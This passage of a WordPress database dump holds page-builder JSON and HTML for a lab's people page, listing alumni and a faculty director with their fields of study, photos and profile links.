Science<br><\\/p>\"}},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/anvith-anand\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707}]},\"parentId\":\"182-c165\",\"index\":1,\"id\":\"182-c169\",\"partialId\":182,\"styleRef\":919,\"type\":\"content\",\"domuuid\":\"5-c303\"}],\"styleRef\":912,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c170\",\"parentId\":\"182-c159\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c170\",\"index\":0,\"id\":\"182-c171\",\"partialId\":182,\"styleRef\":920,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/03\\/cropped-cropped-Alex-e1697208598736.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":1782,\"size\":\"\"}},{\"name\":\"hop-heading\",\"parentId\":\"182-c170\",\"index\":0,\"id\":\"182-c172\",\"partialId\":182,\"styleRef\":914,\"type\":\"content\",\"props\":{\"content\":\"Alex Asige\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c170\",\"index\":2,\"id\":\"182-c173\",\"partialId\":182,\"styleRef\":915,\"type\":\"content\",\"props\":{\"content\":\"<p>Geosciences<br><\\/p>\"}},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/twitter\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/twitter.com\\/i\\/flow\\/login?redirect_after_login=%2FAsigeAlex\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.39751110599882}]},\"parentId\":\"182-c170\",\"index\":1,\"id\":\"182-c174\",\"partialId\":182,\"styleRef\":921,\"type\":\"content\",\"domuuid\":\"5-c336\"}],\"styleRef\":912,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c175\",\"parentId\":\"182-c159\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c175\",\"index\":0,\"id\":\"182-c176\",\"partialId\":182,\"styleRef\":922,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/03\\/cropped-cropped-cropped-Bhavya-scaled-1-e1697208670956.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":1784,\"size\":\"\"}},{\"name\":\"hop-heading\",\"parentId\":\"182-c175\",\"index\":0,\"id\":\"182-c177\",\"partialId\":182,\"styleRef\":914,\"type\":\"content\",\"props\":{\"content\":\"Bhavya Busireddy\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c175\",\"index\":2,\"id\":\"182-c178\",\"partialId\":182,\"styleRef\":915,\"type\":\"content\",\"props\":{\"content\":\"<p><span style=\\\"font-weight: 400; font-size: 16px; font-family: Open Sans; color: rgb(64, 85, 169);\\\">Computer Science<\\/span><\\/p>\"}},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/bhavya-busireddy-b052b192\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707}]},\"parentId\":\"182-c175\",\"index\":1,\"id\":\"182-c179\",\"partialId\":182,\"styleRef\":923,\"type\":\"content\",\"domuuid\":\"5-c336\"}],\"styleRef\":912,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c180\",\"parentId\":\"182-c159\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c180\",\"index\":0,\"id\":\"182-c181\",\"partialId\":182,\"styleRef\":913,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/03\\/cropped-cropped-cropped-Vineeth-e1697208720256.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":1786,\"size\":\"\"},\"domuuid\":\"182-c257\"},{\"name\":\"hop-heading\",\"parentId\":\"182-c180\",\"index\":0,\"id\":\"182-c182\",\"partialId\":182,\"styleRef\":914,\"type\":\"content\",\"props\":{\"content\":\"Vineeth Kumar Chandha\"},\"domuuid\":\"182-c258\"},{\"name\":\"hop-text\",\"parentId\":\"182-c180\",\"index\":2,\"id\":\"182-c183\",\"partialId\":182,\"styleRef\":915,\"type\":\"content\",\"props\":{\"content\":\"<p>Computer Science<br><\\/p>\"},\"domuuid\":\"182-c259\"},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/vineeth-kumar-chandha-207611149\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707}]},\"parentId\":\"182-c180\",\"index\":1,\"id\":\"182-c184\",\"partialId\":182,\"styleRef\":917,\"type\":\"content\",\"domuuid\":\"182-c261\"}],\"styleRef\":912,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c185\",\"parentId\":\"182-c159\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c185\",\"index\":0,\"id\":\"182-c186\",\"partialId\":182,\"styleRef\":913,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/04\\/cropped-cropped-cropped-sathwik-2-scaled-1-e1697208827396.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":1788,\"size\":\"\"},\"domuuid\":\"182-c257\"},{\"name\":\"hop-heading\",\"parentId\":\"182-c185\",\"index\":0,\"id\":\"182-c187\",\"partialId\":182,\"styleRef\":914,\"type\":\"content\",\"props\":{\"content\":\"Sathwik Chowda\"},\"domuuid\":\"182-c258\"},{\"name\":\"hop-text\",\"parentId\":\"182-c185\",\"index\":2,\"id\":\"182-c188\",\"partialId\":182,\"styleRef\":915,\"type\":\"content\",\"props\":{\"content\":\"<p><span style=\\\"font-weight: 400; font-size: 16px; font-family: Open Sans; color: rgb(64, 85, 169);\\\">Computer Science<\\/span><\\/p>\"},\"domuuid\":\"182-c259\"},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/sathwikchowda\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707}]},\"parentId\":\"182-c185\",\"index\":1,\"id\":\"182-c189\",\"partialId\":182,\"styleRef\":917,\"type\":\"content\",\"domuuid\":\"182-c261\"}],\"styleRef\":912,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c190\",\"parentId\":\"182-c159\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c190\",\"index\":0,\"id\":\"182-c191\",\"partialId\":182,\"styleRef\":913,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/03\\/cropped-cropped-cropped-Brindal-e1697208968672.jpeg\",\"caption\":{\"text\":\"\"},\"imageId\":1790,\"size\":\"\"},\"domuuid\":\"182-c257\"},{\"name\":\"hop-heading\",\"parentId\":\"182-c190\",\"index\":0,\"id\":\"182-c192\",\"partialId\":182,\"styleRef\":914,\"type\":\"content\",\"props\":{\"content\":\"Brindal Dhol\"},\"domuuid\":\"182-c258\"},{\"name\":\"hop-text\",\"parentId\":\"182-c190\",\"index\":2,\"id\":\"182-c193\",\"partialId\":182,\"styleRef\":915,\"type\":\"content\",\"props\":{\"content\":\"<p>Computer Science<br><\\/p>\"},\"domuuid\":\"182-c259\"},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/brindaldhol\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707}]},\"parentId\":\"182-c190\",\"index\":1,\"id\":\"182-c194\",\"partialId\":182,\"styleRef\":917,\"type\":\"content\",\"domuuid\":\"182-c261\"}],\"styleRef\":912,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c195\",\"parentId\":\"182-c159\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c195\",\"index\":0,\"id\":\"182-c196\",\"partialId\":182,\"styleRef\":913,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/03\\/cropped-cropped-cropped-ruby_parcells-scaled-1-2-e1697209095569.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":1792,\"size\":\"\"},\"domuuid\":\"182-c257\"},{\"name\":\"hop-heading\",\"parentId\":\"182-c195\",\"index\":0,\"id\":\"182-c197\",\"partialId\":182,\"styleRef\":914,\"type\":\"content\",\"props\":{\"content\":\"Ruby Parcells\"},\"domuuid\":\"182-c258\"},{\"name\":\"hop-text\",\"parentId\":\"182-c195\",\"index\":2,\"id\":\"182-c198\",\"partialId\":182,\"styleRef\":915,\"type\":\"content\",\"props\":{\"content\":\"<p>Geosciences<br><\\/p>\"},\"domuuid\":\"182-c259\"}],\"styleRef\":912,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c199\",\"parentId\":\"182-c159\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c199\",\"index\":0,\"id\":\"182-c200\",\"partialId\":182,\"styleRef\":913,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/03\\/cropped-cropped-cropped-Reshmanjali-1-e1697209179440.jpeg\",\"caption\":{\"text\":\"\"},\"imageId\":1794,\"size\":\"\"},\"domuuid\":\"182-c257\"},{\"name\":\"hop-heading\",\"parentId\":\"182-c199\",\"index\":0,\"id\":\"182-c201\",\"partialId\":182,\"styleRef\":914,\"type\":\"content\",\"props\":{\"content\":\"Sai Reshmanjali\"},\"domuuid\":\"182-c258\"},{\"name\":\"hop-text\",\"parentId\":\"182-c199\",\"index\":2,\"id\":\"182-c202\",\"partialId\":182,\"styleRef\":915,\"type\":\"content\",\"props\":{\"content\":\"<p><span style=\\\"font-weight: 400; font-size: 16px; font-family: Open Sans; color: rgb(64, 85, 169);\\\">Computer Science<\\/span><\\/p>\"},\"domuuid\":\"182-c259\"},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/reshmanjali-guntupalli\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707}]},\"parentId\":\"182-c199\",\"index\":1,\"id\":\"182-c203\",\"partialId\":182,\"styleRef\":917,\"type\":\"content\",\"domuuid\":\"182-c261\"}],\"styleRef\":912,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c212\",\"parentId\":\"182-c159\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c212\",\"index\":0,\"id\":\"182-c213\",\"partialId\":182,\"styleRef\":913,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2023\\/10\\/cropped-cropped-cropped-Eliza-Schuh-e1697208271242.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":1795,\"size\":\"\"},\"domuuid\":\"182-c161\"},{\"name\":\"hop-heading\",\"parentId\":\"182-c212\",\"index\":0,\"id\":\"182-c214\",\"partialId\":182,\"styleRef\":914,\"type\":\"content\",\"props\":{\"content\":\"Eliza Schuh<br>\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c212\",\"index\":2,\"id\":\"182-c215\",\"partialId\":182,\"styleRef\":915,\"type\":\"content\",\"props\":{\"content\":\"<p>Computer Science<br><\\/p>\"}},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/search\\/results\\/all\\/?fetchDeterministicClustersOnly=true&heroEntityKey=urn%3Ali%3Afsd_profile%3AACoAACVdt3kBua3o83BdyteC4Ssk8shnCAvZZZc&keywords=eliza%20schuh&origin=RICH_QUERY_TYPEAHEAD_HISTORY&position=0&searchId=e7657352-5ea3-4501-b984-d21542771bc4&sid=WW)&spellCorrectionEnabled=true\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707}]},\"parentId\":\"182-c212\",\"index\":1,\"id\":\"182-c216\",\"partialId\":182,\"styleRef\":917,\"type\":\"content\",\"domuuid\":\"5-c336\"}],\"styleRef\":912,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c204\",\"parentId\":\"182-c159\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c204\",\"index\":0,\"id\":\"182-c205\",\"partialId\":182,\"styleRef\":913,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/03\\/cropped-cropped-cropped-Bronson-e1697209357897.png\",\"caption\":{\"text\":\"\"},\"imageId\":1797,\"size\":\"\"},\"domuuid\":\"182-c257\"},{\"name\":\"hop-heading\",\"parentId\":\"182-c204\",\"index\":0,\"id\":\"182-c206\",\"partialId\":182,\"styleRef\":914,\"type\":\"content\",\"props\":{\"content\":\"Bronson Tharpe\"},\"domuuid\":\"182-c258\"},{\"name\":\"hop-text\",\"parentId\":\"182-c204\",\"index\":2,\"id\":\"182-c207\",\"partialId\":182,\"styleRef\":915,\"type\":\"content\",\"props\":{\"content\":\"<p>Computer Science<\\/p>\"},\"domuuid\":\"182-c259\"},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/bronson-tharpe-9b754a1ba\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707}]},\"parentId\":\"182-c204\",\"index\":1,\"id\":\"182-c208\",\"partialId\":182,\"styleRef\":917,\"type\":\"content\",\"domuuid\":\"182-c261\"}],\"styleRef\":912,\"type\":\"content\"}],\"id\":\"182-c159\",\"parentId\":\"182-c158\",\"partialId\":182,\"styleRef\":911,\"type\":\"content\"}],\"id\":\"182-c158\",\"parentId\":\"182-c1\",\"partialId\":182,\"slots\":{\"header\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":80,\"unit\":\"%\"}}}}},\"children\":[{\"name\":\"hop-heading\",\"props\":{\"content\":\"Alumni\"},\"id\":\"182-c211\",\"parentId\":\"182-c210\",\"partialId\":182,\"styleRef\":926,\"type\":\"content\"}],\"id\":\"182-c210\",\"parentId\":\"182-c209\",\"partialId\":182,\"styleRef\":925,\"type\":\"content\"}],\"id\":\"182-c209\",\"parentId\":\"182-c158\",\"partialId\":182,\"styleRef\":924,\"type\":\"content\"}]},\"styleRef\":910,\"type\":\"content\"}],\"id\":\"182-c1\",\"partialId\":182,\"styleRef\":407,\"type\":\"content\"}','','','inherit','closed','closed','','562-revision-v1','','','2023-10-13 11:02:56','2023-10-13 15:02:56','',562,'https://gsudice.dataconn.net/?p=1798',0,'revision','',0),(1799,1,'2023-10-13 11:02:56','2023-10-13 15:02:56','<div data-colibri-id=\"182-c1\" class=\"style-407 style-local-182-c1 position-relative\">\n  <!---->\n  <div data-colibri-component=\"section\" data-colibri-id=\"182-c2\" id=\"faculty\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-970 style-local-182-c2 position-relative\">\n    <!---->\n    <!---->\n    <div class=\"h-section-grid-container h-section-boxed-container\">\n      <div data-colibri-id=\"182-c64\" class=\"h-row-container gutters-row-lg-2 gutters-row-md-2 gutters-row-0 gutters-row-v-lg-2 gutters-row-v-md-2 gutters-row-v-2 style-984 style-local-182-c64 position-relative\">\n        <!---->\n        <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-2 gutters-col-md-2 gutters-col-0 gutters-col-v-lg-2 gutters-col-v-md-2 gutters-col-v-2\">\n          <!---->\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-985-outer style-local-182-c65-outer\">\n            <div data-colibri-id=\"182-c65\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-985 style-local-182-c65 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c66\" class=\"h-global-transition-all h-heading style-986 style-local-182-c66 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-986 style-local-182-c66\">\n                    <!---->\n                    <!---->\n                    <h2 class=\"\">Faculty</h2>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n        </div>\n      </div>\n      <div data-colibri-id=\"182-c3\" class=\"h-row-container gutters-row-lg-2 gutters-row-md-2 gutters-row-0 gutters-row-v-lg-2 gutters-row-v-md-2 gutters-row-v-2 style-971 style-local-182-c3 position-relative\">\n        <!---->\n        <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-2 gutters-col-md-2 gutters-col-0 gutters-col-v-lg-2 gutters-col-v-md-2 gutters-col-v-2\">\n          <!---->\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-972-outer style-local-182-c4-outer\">\n            <div data-colibri-id=\"182-c4\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-972 style-local-182-c4 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c5\" class=\"d-block style-973 style-local-182-c5 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-cropped-cropped-cropped-cropped-headshot-1-e1651208089645-2-e1697201737742.jpg\" class=\"wp-image-1697 style-973-image style-local-182-c5-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-973-frameImage style-local-182-c5-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c6\" class=\"h-global-transition-all h-heading style-974 style-local-182-c6 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-974 style-local-182-c6\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Chetan Tiwari</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c7\" class=\"h-text h-text-component style-975 style-local-182-c7 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Director</p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c8\" class=\"h-text h-text-component style-976 style-local-182-c8 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Geosciences</p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c9\" class=\"style-977 style-local-182-c9 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/in/chetan-tiwari/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://cas.gsu.edu/profile/chetan-tiwari/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Font Awesome (https://fontawesome.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" id=\"external-link\" viewBox=\"0 0 1792 1896.0833\">\n                              <path d=\"M1408 928v320q0 119-84.5 203.5T1120 1536H288q-119 0-203.5-84.5T0 1248V416q0-119 84.5-203.5T288 128h704q14 0 23 9t9 23v64q0 14-9 23t-23 9H288q-66 0-113 47t-47 113v832q0 66 47 113t113 47h832q66 0 113-47t47-113V928q0-14 9-23t23-9h64q14 0 23 9t9 23zm384-864v512q0 26-19 45t-45 19-45-19l-176-176-652 652q-10 10-23 10t-23-10L695 983q-10-10-10-23t10-23l652-652-176-176q-19-19-19-45t19-45 45-19h512q26 0 45 19t19 45z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://scholar.google.com/citations?user=C5PVPkoAAAAJ&amp;hl=en\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1341.797 166.992c14.648 0 23.438 5.859 23.438 11.719 2.93 8.789 2.93 17.578 2.93 29.297v503.906c0 11.719-5.859 20.508-11.719 29.297-8.789 8.789-17.578 11.719-29.297 11.719h-17.578c-11.719 0-20.508-5.859-29.297-11.719-8.789-8.789-11.719-17.578-11.719-29.297v-503.906c0-11.719 0-20.508 0-29.297 2.93-5.859 8.789-11.719 23.438-11.719v-67.383l-219.727 181.641c2.93 2.93 2.93 5.859 5.859 5.859 0 2.93 2.93 2.93 2.93 5.859 8.789 17.578 17.578 38.086 23.438 58.594 2.93 20.508 5.859 46.875 5.859 73.242 0 20.508 0 38.086-2.93 55.664s-8.789 38.086-14.648 52.734c-8.789 14.648-14.648 29.297-23.438 43.945-8.789 11.719-17.578 23.438-26.367 32.227-8.789 11.719-20.508 20.508-29.297 29.297s-20.508 17.578-29.297 26.367c-8.789 8.789-17.578 17.578-26.367 26.367s-14.648 17.578-23.438 26.367c-5.859 8.789-11.719 17.578-14.648 26.367-2.93 11.719-2.93 20.508-2.93 29.297 0 11.719 0 20.508 5.859 29.297 2.93 8.789 8.789 20.508 20.508 29.297 8.789 8.789 17.578 20.508 29.297 29.297 8.789 8.789 20.508 20.508 35.156 29.297 11.719 8.789 26.367 17.578 38.086 29.297 11.719 8.789 26.367 20.508 38.086 32.227s23.438 23.438 35.156 38.086c11.719 17.578 20.508 32.227 29.297 49.805s14.648 38.086 17.578 55.664c5.859 20.508 8.789 41.016 8.789 61.523 0 29.297-2.93 55.664-11.719 82.031-5.859 26.367-17.578 49.805-32.227 70.313-14.648 23.438-32.227 43.945-49.805 61.523-20.508 20.508-41.016 35.156-61.523 49.805-26.367 11.719-49.805 26.367-73.242 35.156-26.367 8.789-49.805 17.578-79.102 23.438-23.438 5.859-49.805 11.719-79.102 14.648-26.367 2.93-52.734 5.859-79.102 5.859-14.648 0-32.227 0-49.805-2.93-14.648 0-32.227-2.93-49.805-5.859-14.648-2.93-32.227-5.859-49.805-8.789-17.578-5.859-35.156-11.719-49.805-17.578-17.578-5.859-35.156-11.719-49.805-20.508s-29.297-17.578-41.016-29.297c-14.648-8.789-26.367-20.508-35.156-32.227-11.719-11.719-20.508-26.367-29.297-41.016s-14.648-32.227-20.508-49.805c-2.93-14.648-5.859-32.227-5.859-52.734 0-23.438 2.93-43.945 8.789-64.453s14.648-41.016 29.297-61.523c11.719-17.578 26.367-35.156 43.945-52.734 14.648-14.648 35.156-29.297 55.664-41.016 17.578-11.719 38.086-20.508 61.523-32.227 20.508-8.789 46.875-14.648 76.172-23.438 29.297-5.859 58.594-11.719 90.82-14.648 32.227-5.859 70.313-8.789 108.398-11.719-17.578-23.438-29.297-43.945-38.086-64.453s-14.648-41.016-14.648-58.594c0-11.719 2.93-23.438 5.859-35.156s5.859-23.438 11.719-38.086c-8.789 0-17.578 2.93-29.297 2.93-8.789 0-17.578 0-26.367 0-43.945 0-79.102-5.859-114.258-17.578-35.156-14.648-67.383-32.227-93.75-61.523-29.297-26.367-49.805-58.594-64.453-90.82s-20.508-70.313-20.508-111.328c0-2.93 0-8.789 0-11.719 0-5.859 0-8.789 0-11.719h-339.844l506.836-439.453h834.961l-76.172 58.594v108.398zM922.852 1037.109c0-2.93-5.859-5.859-11.719-8.789-5.859-5.859-11.719-8.789-20.508-17.578-8.789-5.859-17.578-11.719-23.438-17.578-2.93-2.93-5.859-5.859-8.789-5.859s-8.789 0-14.648 0c-5.859 0-14.648-2.93-23.438-2.93-20.508 0-38.086 2.93-55.664 2.93-20.508 2.93-38.086 5.859-55.664 8.789s-38.086 8.789-55.664 14.648c-17.578 5.859-35.156 11.719-52.734 17.578-17.578 8.789-32.227 17.578-49.805 29.297-11.719 11.719-26.367 23.438-35.156 38.086-11.719 14.648-20.508 32.227-26.367 49.805s-8.789 35.156-8.789 55.664c0 20.508 2.93 38.086 8.789 55.664 2.93 14.648 11.719 32.227 23.438 46.875 8.789 14.648 20.508 29.297 32.227 38.086 14.648 11.719 29.297 23.438 43.945 29.297 14.648 8.789 29.297 17.578 46.875 23.438s32.227 11.719 49.805 14.648c20.508 5.859 38.086 8.789 52.734 8.789 20.508 2.93 38.086 2.93 52.734 2.93 38.086 0 70.313-2.93 99.609-11.719 32.227-5.859 58.594-17.578 84.961-35.156s43.945-35.156 55.664-61.523c14.648-26.367 20.508-52.734 20.508-87.891 0-5.859 0-11.719-2.93-20.508 0-5.859 0-11.719-2.93-20.508s-5.859-14.648-5.859-20.508c-2.93-5.859-5.859-11.719-5.859-14.648-2.93-5.859-5.859-11.719-8.789-17.578s-8.789-11.719-14.648-17.578c-5.859-8.789-8.789-11.719-14.648-17.578s-8.789-8.789-11.719-11.719c-2.93-2.93-5.859-5.859-11.719-11.719-2.93-5.859-11.719-11.719-17.578-17.578-8.789-8.789-14.648-11.719-20.508-17.578-5.859 2.93-8.789 0-11.719 0zM911.133 641.602c11.719-14.648 23.438-35.156 32.227-58.594s11.719-46.875 11.719-70.313c0-23.438-2.93-46.875-5.859-70.313-5.859-23.438-8.789-46.875-17.578-73.242-8.789-23.438-17.578-46.875-32.227-70.313-11.719-20.508-26.367-41.016-43.945-61.523s-38.086-35.156-58.594-43.945c-17.578-11.719-41.016-14.648-64.453-14.648-26.367 0-49.805 2.93-70.313 14.648-17.578 8.789-35.156 23.438-49.805 41.016-14.648 20.508-23.438 38.086-32.227 61.523-5.859 23.438-8.789 49.805-8.789 76.172 0 23.438 0 46.875 5.859 70.313 2.93 20.508 8.789 43.945 14.648 70.313 8.789 23.438 17.578 43.945 32.227 67.383 11.719 20.508 26.367 38.086 43.945 58.594 17.578 17.578 38.086 32.227 58.594 41.016s41.016 